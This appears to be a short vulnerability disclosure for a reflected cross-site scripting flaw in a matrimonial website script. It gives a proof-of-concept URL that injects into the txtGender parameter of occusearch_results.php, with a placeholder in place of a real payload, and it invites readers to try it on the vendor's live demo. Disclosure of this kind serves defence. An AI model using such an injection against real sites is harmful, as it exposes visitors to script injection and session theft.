# Vendor Homepage: http://www.scubez.net/
# Software Link: http://www.mscript.in/
# Demo Details: http://www.mscript.in/matrimonial-demo.html
# Live Demo : http://www.live.mscript.in/
# Version: N/A
# Category: Webapps
# Tested on: Windows_7_64x
# CVE: N/A
==================
# Exploit Author: Mgm-Eg
# Author Social: ask.fm/m1g1m
====================
# Description:
# The vulnerability allows an attacker to inject and execute Javascript code
poc :
| (XSS) |
-----------
http://localhost/occusearch_results.php? |txtGender=(XSS)&txtSAge=18&txtEAge=80&txtOccu=Any&Submit.x=27&Submit.y=1
----
You can try it on (Matrimonial Sites DEMO)